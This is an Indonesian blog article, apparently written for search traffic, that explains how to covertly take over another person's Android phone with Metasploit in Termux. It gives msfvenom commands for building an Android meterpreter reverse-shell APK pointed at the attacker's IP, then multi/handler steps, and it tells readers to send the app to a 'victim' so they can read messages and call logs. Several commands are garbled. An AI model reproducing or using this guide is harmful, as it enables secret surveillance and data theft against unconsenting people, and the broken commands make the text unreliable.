Cara Hack Android Dengan Metasploit Termux 2024

Cara Hack Android Dengan Metasploit Termux
Cara Hack Android Dengan Metasploit Termux - Banyak orang yang ingin tahu cara mengendalikan hp orang lain tanpa diketahui termux untuk kepentingan mereka.

Tetapi tidak sedikit yang sudah mengeluh sebelum mencobanya karena mereka terbayang akan kerumitan saat menyadap hp orang lain.

Apakah anda berpikir menyadap ponsel seseorang itu sulit? Ternyata untuk meretas ponsel seseorang bisa anda lakukan, salah satunya dengan cara sadap hp seseorang dengan menggunakan  Metasploit Termux.

Matasploit merupakan salah satu tools yang sering digunakan para hacker untuk menyadap smartphone seseorang.

Dengan menggunakan tools ini, anda bisa melihat isi pesan, log panggilan, screenshot gambar, daftar perekam suara dan masih banyak lagi.

Untuk cara menggunakan metaspolist ini tergolong sangat mudah, anda bisa menyimak panduannya pada artikel yang akan kami bahas untuk anda.

Namun, sebelum itu ada beberapa syarat yang harus anda ikuti, salah satunya dengan mengunduh aplikasi termux terlebih dahulu dan menginstall tools metasploit pada termux anda.


Pembahasan Cara Hack Android Dengan Metasploit Termux

Pada dasarnya, Termux merupakan aplikasi emulator terminal untuk Android dan Linux environment yang berjalan di Android tanpa perlu rooting atau pengaturan khusus.

Tool atau paket tambahan juga tersedia dan dapat anda instal menggunakan APT package manager.

Jika anda belum memiliki aplikasi termux, anda bisa mengunduhnya secara gratis melalui Play Store atau link berikut Download aplikasi termux.

Yang membedakan Termux dengan aplikasi emulator terminal lainnya adalah Termux sudah diatur sedemikian rupa sehingga environment di Termux sama dengan environment Linux Debian.

Dengan fitur dan pengaturan environment seperti di atas membuat Termux menjadi sangat spesial karena anda dapat menginstal tool hacking seperti Metasploit.

Untuk cara hack android dengan metasploit termux dengan lengkap, anda bisa menyimak ulasan dibawah ini.


Cara Hack Android Dengan Metasploit Termux


Cara Hack Android Dengan Metasploit Termux Anti Gagal

Cara Hack Android Dengan Metasploit Termux
Cara Hack Android Dengan Metasploit Termux Anti Gagal
Memiliki berbagai fungsi yang sangat luar biasa, banyak orang yang menginginkan aplikasi Termux ini.

Apalagi untuk anda yang ingin menyadap hp seseorang, pastinya anda sangat memerlukan yang namanya aplikasi satu ini.

Dengan menggunakan aplikasi termux, bisa memudahkan anda ketika anda ingin menyadap hp seseorang.

Selain memiliki berbagai fungsi, ternyata aplikasi termux juga sangat mudah digunakan dan dijamin sangan aman.

Selain itu, untuk menyadap atau menghack hp orang lain, anda juga bisa menggunakan metasploit termux yang bisa anda simak pada ulasan dibawah ini.


Metasploit ini bisa dikatakan proyek keamanan komputer yang sudah menyediakan informasi mengenai kerentanan keamanan dan bantuan dalam pengujian pengembangan tanda tangan IDS.

Apabila anda sudah menginstal aplikasi termux yang sudah kami berikan pada ulasan diatas namun anda belum menginstall tools metasploitnya, anda bisa melihat cara install metasploit termux yang akan kami berikan untuk anda seperti dibawah ini.

Sebelum lanjut ke cara hack android dengan metasploit termux, anda harus menyiapkan beberapa alat yang harus anda persiapkan seperti berikut:
  • Metasploit
  • Termux

Setelah anda menyiapkan beberapa alat tersebut, berikut langkah-langkahnya:

Langkah pertama yang harus anda lakukan yakni, masuk ke folder Metasploit lalu anda dapat memilih CD Metasploit-Framework

Setelah itu, anda dapat memuat payloud Android dengan perintah kode termux di Termux anda seperti berikut ini:

ruby.msfvenom -p android/meterpreter/reverse_http lhost = "alamat IP Anda" 8080 r> "nama aplikasi".apk

Setelah anda selesai menginstall payloud, anda dapat memeriksa payload dengan mengetikkan perintah berikut “ ls ” di aplikasi Termux anda.

Kemudian, anda harus mengisi dengan format menggunakan alamt IP anda dan untuk mencari IP tersebut, anda perlu mengetiknya pada aplikasi termux dengan perintah berikut " ifconfig dan nama apk.

Jika sudah, anda bisa memberikan nama sesuai dengan nama aplikasi yang anda inginkan.

Langkah selanjutnya, anda harus membuka metasploit dengan perintah " ruby msfconsole ".

Lalu, anda bisa menulis perintah berikut ini:
  • use exploit/multi/handler
  • set LHOST 192.16x.x.x
  • set payload android/ meterpreter/reverse tcp
  • exploit

Apabila anda sudah menulis perintah tersebut, kemudian isi alamat IP menggunakan milik anda lalu kirim ke aplikasi tersebut ke hp korban.

Jika anda sudah menginstall aplikasi tersebut pada hp korban, anda dapat membuka dan memulai menyadap hp korban menggunakan perintah sesuai keinginan anda.


Akhir Kata

Demikianlah informasi yang bisa kami berikan untuk anda yang sedang mencari cara untuk menyadap hp orang lain menggunakan metasploit termux.

Apabila ingin berhasil menghack ponsel seseorang, anda bisa menggunakan dan mengikuti cara diatas dengan benar dan teliti.

Kami tidak bisa menjamin apakah cara diatas berhasil sepenuhnya, tetapi tidak ada salahnya anda mencoba cara yang kami berikan pada ulasan diatas.

Itulah seluruh isi artikel kami kali ini mengenai cara hack android dengan Metasploit Termux 2024. Selamat mencoba.

Iklan Atas Artikel

Iklan Tengah Artikel 1

Iklan Tengah Artikel 2

Iklan Bawah Artikel